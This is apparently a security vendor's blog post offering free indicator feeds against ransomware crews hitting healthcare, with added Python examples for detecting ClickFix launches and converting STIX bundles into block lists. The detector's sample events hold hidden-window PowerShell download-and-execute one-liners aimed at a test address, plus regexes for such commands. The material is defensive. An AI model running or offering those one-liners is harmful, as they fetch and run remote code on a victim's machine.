Free Threat Intel for Minnesota Healthcare: 60 IOCs You Can Block Today
- Patrick Duggan
- Nov 30, 2025
- 3 min read
TL;DR: We just published 3 OTX pulses with 60 healthcare-specific IOCs covering Interlock, Akira, RansomHub, and ALPHV/BlackCat. Free. No paywall. Subscribe and block.
The Problem
The FBI says healthcare ransomware attacks are up 400% in 2025. Health-ISAC documented 458 incidents in 2024 alone. The Change Healthcare attack left millions unable to pay for medications. The Ascension attack hit 140 hospitals and 40 senior care facilities.
Meanwhile, most threat intel costs $50K-$200K/year and sits behind sales calls.
The Solution
We built three OTX pulses specifically for healthcare defenders. Sixty indicators of compromise. Zero cost. Subscribe with a free AlienVault account and start blocking.
Pulse 1: FDA 510(k) Medical Device Security **26 IOCs** | [Subscribe](https://otx.alienvault.com/pulse/692c9d81b4e8f82f6d98e1c6)
The pulse covers eleven CVEs. Six of them, shown below, hit devices from manufacturers you almost certainly have in your facilities right now. The last column is a mix of CVSS scores and the headline issue where a single score does not tell the story:

| Manufacturer | CVE | Device | Severity / issue |
|--------------|-----|--------|------------------|
| Contec | CVE-2025-0683 | CMS8000 Patient Monitor | FDA recommends removal |
| Medtronic | CVE-2025-29997 | MyCareLink | Auth bypass |
| Philips | CVE-2025-2229 | IntelliSpace Cardiovascular | Path traversal |
| GE Healthcare | CVE-2024-27107 | Ultrasound | 9.6 Critical |
| BD | CVE-2024-12248 | BACTEC | Buffer overflow |
| Siemens | CVE-2024-37999 | Medicalis | Multiple |
If you have Contec CMS8000 patient monitors, the FDA literally recommends removing them from your network. That's not FUD—that's the federal government telling you to unplug.
Pulse 2: Healthcare Ransomware - RansomHub + ALPHV/BlackCat **15 IOCs** | [Subscribe](https://otx.alienvault.com/pulse/692cae3412d41ee40eda7e11)
ALPHV/BlackCat is the crew behind the Change Healthcare attack; RansomHub later re-extorted Change Healthcare with the same stolen data after the ALPHV affiliate was cut out of the ransom. C2 IPs, payload servers, and the CVEs they exploit for initial access:
• CVE-2023-3519 - Citrix ADC (RansomHub initial access)
• CVE-2024-1709 - ScreenConnect auth bypass (exploited by ALPHV/BlackCat affiliates; the Change Healthcare intrusion itself came through a Citrix remote-access portal with no MFA)
• CVE-2023-27997 - FortiOS SSL-VPN (RansomHub)
When RansomHub's infrastructure went dark at the end of March 2025, DragonForce claimed the operation had joined theirs. Same playbook, new brand.
Pulse 3: Healthcare Ransomware Master - Interlock + Akira **19 IOCs** | [Subscribe](https://otx.alienvault.com/pulse/692cb21533f7235662d8bf2e)
The 2025 threats. CISA released AA25-203A (Interlock) in July and updated AA24-109A (Akira) in November. We extracted the file hashes and CVEs so you don't have to parse PDFs.
Interlock uses ClickFix social engineering: fake CAPTCHA pages that tell the user to paste a command into the Run dialog, which launches PowerShell. They're explicitly targeting healthcare.
Akira gets in through VPN appliances without MFA (Cisco ASA, SonicWall) and through unpatched Veeam backup servers. If you run any of those without multi-factor and current patches, you're on their menu.
Hashes are included for both encryptors and their supporting tools (the SystemBC proxy/RAT, Lumma stealer, Cobalt Strike).
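Hashes only catch the payloads you already know. For the ClickFix entry point described above, here is an added example (mine, not code from the post, from CISA AA25-203A, or from DugganUSA) that scores Sysmon-style process-creation events for the pattern a ClickFix launch leaves: a shell spawned by explorer.exe with a hidden window and a download-and-execute one-liner, sometimes wrapped in `-EncodedCommand`. The scoring, the threshold, the field names and the sample events (including the 198.51.100.9 test address) are my assumptions, not indicators from any pulse.

```python
"""Flag ClickFix-style shell launches in process-creation telemetry.

Added example; not code from the post, from CISA AA25-203A or from
DugganUSA. A ClickFix lure has the victim paste a command into the Win+R
Run box, so the shell is spawned by explorer.exe with a hidden window and
a download-and-execute one-liner, often wrapped in -EncodedCommand. The
scoring, threshold, field names (Sysmon Event ID 1 style) and sample
events are my assumptions.
"""
import base64
import binascii
import re

SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}

# (label, regex) pairs; an interactive, human-typed command rarely hits
# more than one of these at once.
MARKERS = [
    ("hidden window", r"-w(?:indowstyle)?\s+hidden"),
    ("no profile", r"-nop(?:rofile)?\b"),
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("web download", r"\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring"),
    ("mshta from url", r"\bmshta\b.*https?://"),
    ("url in command", r"https?://"),
]

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def _decode_encoded_command(cmdline):
    """Plaintext of a -e/-enc/-EncodedCommand payload (UTF-16LE base64), or ''."""
    m = re.search(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""

def score_event(event):
    """Return (score, reasons) for one process-creation event dict."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image not in SHELLS:
        return 0, []
    decoded = _decode_encoded_command(cmd)
    text = f"{cmd} {decoded}"  # scan the decoded payload as well as the raw line
    reasons = [label for label, rx in MARKERS if re.search(rx, text, re.I)]
    if parent in RUN_DIALOG_PARENTS:
        reasons.append("spawned by explorer.exe (Run dialog or double-click)")
    if decoded:
        reasons.append("encoded command")
    return len(reasons), reasons

def is_clickfix_like(event, threshold=3):
    return score_event(event)[0] >= threshold

def triage(events, threshold=3):
    """Indexes of events that look like ClickFix launches."""
    return [i for i, e in enumerate(events) if is_clickfix_like(e, threshold)]

# Constructed sample events. 198.51.100.9 is an RFC 5737 test address.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED = base64.b64encode(
    "iwr http://198.51.100.9/a.ps1 -UseBasicParsing | iex".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    # 0: admin opens a console from the Start menu; explorer parent, no args
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
    # 1: scheduled maintenance script
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\ops\backup.ps1"},
    # 2: ClickFix lure pasted into Win+R: hidden window, download-and-execute
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://198.51.100.9/a.ps1 '
                    '-UseBasicParsing | iex"'},
    # 3: same lure with the payload hidden in -EncodedCommand
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell -nop -w hidden -enc {_ENCODED}"},
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        score, why = score_event(SAMPLE_EVENTS[i])
        print(f"event {i}: score {score}: {'; '.join(why)}")
```

An explorer.exe parent on its own is normal (every user who opens a console from the Start menu produces one), which is why only the combination scores. Windows 4688 events need "Include command line in process creation events" turned on or the `CommandLine` field is empty and this logic sees nothing; Sysmon Event ID 1 has it by default. When a hit fires, the `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key on the host records what was typed into the Run box and corroborates that a user pasted the command.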
Why Free?
Because Minnesota healthcare is critical infrastructure. Mayo Clinic, Children's Minnesota, Fairview, Allina—these organizations protect our community. Threat intel shouldn't be a profit center that prices out the defenders who need it most.
We make money on consulting and enterprise features. The IOCs are table stakes.
How to Use This
Option 1: OTX Subscription (Easiest)
1. Create a free AlienVault OTX account
2. Subscribe to our pulses
3. Your SIEM ingests automatically if you have OTX integration
Option 2: STIX 2.1 Feed (For the Technical)
```
https://analytics.dugganusa.com/api/v1/stix-feed
```
Machine-readable. Ingest into Splunk, QRadar, Sentinel, whatever you run.
Option 3: Manual Block List (For the Scrappy)
Pull the IPs and hashes from the pulse and add them to firewall rules. Sanity-check the IPs first: a shared-hosting or CDN address in any feed can knock out something you need, and a hash only helps where your EDR or AV can match on it. Better than nothing.
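For Option 2 and Option 3 together, here is an added example (mine, not the DugganUSA feed's code or an OTX client) that turns a STIX 2.1 bundle into deduplicated IP, domain, URL and hash lists and renders the firewall-side external dynamic list. The bundle is constructed inline with RFC 5737 test addresses, example.net names and the SHA-256 of an empty file so the script runs offline; its layout follows the STIX 2.1 indicator object spec and is my assumption about the feed's shape, not something confirmed against the live endpoint. The feed URL is the one from the post.

```python
"""Turn a STIX 2.1 indicator bundle into flat block lists.

Added example; not the DugganUSA feed's code or an OTX client. The bundle
below is constructed (RFC 5737 test addresses, example.net names, the
SHA-256 of an empty file) so the script runs offline. To use the live
feed, replace SAMPLE_BUNDLE with urllib.request.urlopen(STIX_FEED_URL).read().
"""
import ipaddress
import json
import re
from datetime import datetime, timezone

STIX_FEED_URL = "https://analytics.dugganusa.com/api/v1/stix-feed"  # from the post

def _ind(n, pattern, **extra):
    """Minimal STIX 2.1 indicator object (constructed test data)."""
    obj = {"type": "indicator", "spec_version": "2.1",
           "id": f"indicator--2d0fd6a0-0a1b-4c6e-9f0c-{n:012d}",
           "created": "2025-11-30T00:00:00.000Z", "modified": "2025-11-30T00:00:00.000Z",
           "pattern_type": "stix", "pattern": pattern,
           "valid_from": "2025-11-30T00:00:00.000Z"}
    obj.update(extra)
    return obj

# Deliberately includes a revoked indicator, an expired one, an RFC 1918
# address and a non-indicator object so every guard in parse_bundle() fires.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle", "id": "bundle--2d0fd6a0-0a1b-4c6e-9f0c-000000000000",
    "objects": [
        _ind(1, "[ipv4-addr:value = '192.0.2.10']", name="C2 (constructed)"),
        _ind(2, "[domain-name:value = 'c2.example.net'] OR "
                "[url:value = 'http://c2.example.net/p']"),
        _ind(3, "[file:hashes.'SHA-256' = "
                "'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855']"),
        _ind(4, "[ipv4-addr:value = '198.51.100.7']", revoked=True),
        _ind(5, "[ipv4-addr:value = '198.51.100.8']", valid_until="2025-06-01T00:00:00.000Z"),
        _ind(6, "[ipv4-addr:value = '10.0.0.5']"),
        {"type": "malware", "spec_version": "2.1",
         "id": "malware--2d0fd6a0-0a1b-4c6e-9f0c-000000000007",
         "created": "2025-11-30T00:00:00.000Z", "modified": "2025-11-30T00:00:00.000Z",
         "name": "ransomware (constructed)", "is_family": True},
    ],
})

# A STIX pattern can chain several comparisons with AND/OR, hence findall().
_NET_RE = re.compile(r"(ipv4-addr|ipv6-addr|domain-name|url):value\s*=\s*'([^']+)'")
_HASH_RE = re.compile(r"file:hashes\.'?(SHA-256|SHA-1|MD5)'?\s*=\s*'([0-9A-Fa-f]+)'")

# Never push these to a perimeter block list, whatever the feed says: one
# bad entry here blocks your own workstations or loopback.
NEVER_BLOCK = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7")]

def _blockable_ip(value):
    try:
        ip = ipaddress.ip_address(value)
    except ValueError:
        return False
    return not any(ip in net for net in NEVER_BLOCK)

def _parse_ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))

def parse_bundle(text, now=None):
    """Map 'ip', 'domain', 'url', 'sha256', 'sha1', 'md5' to sorted lists.

    Skips revoked indicators, indicators whose valid_until has passed
    (relative to `now`: an ISO-8601 string or aware datetime), non-STIX
    pattern types, and any address in NEVER_BLOCK.
    """
    if now is None:
        now = datetime.now(timezone.utc)
    elif isinstance(now, str):
        now = _parse_ts(now)
    out = {k: set() for k in ("ip", "domain", "url", "sha256", "sha1", "md5")}
    for obj in json.loads(text).get("objects", []):
        if obj.get("type") != "indicator" or obj.get("revoked"):
            continue
        if obj.get("pattern_type", "stix") != "stix":
            continue
        if "valid_until" in obj and _parse_ts(obj["valid_until"]) <= now:
            continue
        pattern = obj.get("pattern", "")
        for kind, value in _NET_RE.findall(pattern):
            if kind.endswith("-addr"):
                if _blockable_ip(value):
                    out["ip"].add(value)
            elif kind == "domain-name":
                out["domain"].add(value.lower())
            else:
                out["url"].add(value)
        for algo, digest in _HASH_RE.findall(pattern):
            out[algo.replace("-", "").lower()].add(digest.lower())
    return {k: sorted(v) for k, v in out.items()}

def render_edl(lists):
    """External-dynamic-list text: one IP or domain per line, nothing else."""
    return "".join(f"{entry}\n" for entry in lists["ip"] + lists["domain"])

if __name__ == "__main__":
    lists = parse_bundle(SAMPLE_BUNDLE)
    print(render_edl(lists), end="")
    for algo in ("sha256", "sha1", "md5"):
        for digest in lists[algo]:
            print(f"{algo}:{digest}")
```

Serve the `render_edl()` output from an internal web server and point the firewall's external dynamic list at it; the hash lists go to whatever your EDR accepts for custom IOCs. Re-run on a schedule so revoked and expired indicators drop out, which is the one thing a hand-maintained block list never does.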
The Uncomfortable Truth
Most of you reading this know someone at a hospital that's been hit. Maybe you've been hit yourself. The attackers share IOCs freely on dark web forums. Why don't we share defense freely on the regular web?
Health-ISAC does great work, but membership costs money. CISA publishes advisories, but who has time to parse government PDFs? We're trying to close the gap.
60 IOCs. 3 pulses. Zero excuses.
Resources
• [DugganUSA OTX Profile](https://otx.alienvault.com/user/pduggusa) - 1,134+ total indicators
• [STIX Feed](https://analytics.dugganusa.com/api/v1/stix-feed) - Machine-readable
• [CISA AA25-203A](https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a) - Interlock advisory
• [CISA AA24-109A](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a) - Akira advisory
• [Health-ISAC 2025 Report](https://health-isac.org/wp-content/uploads/Health-ISAC_2025-Annual-Threat-Report.pdf) - Industry threat landscape
*Patrick Duggan is founder of DugganUSA, a Minnesota-based security company. He believes threat intel should be shared, mistakes should be admitted publicly, and healthcare defenders deserve better than sales calls.*
*Questions? Reach out: [email protected]*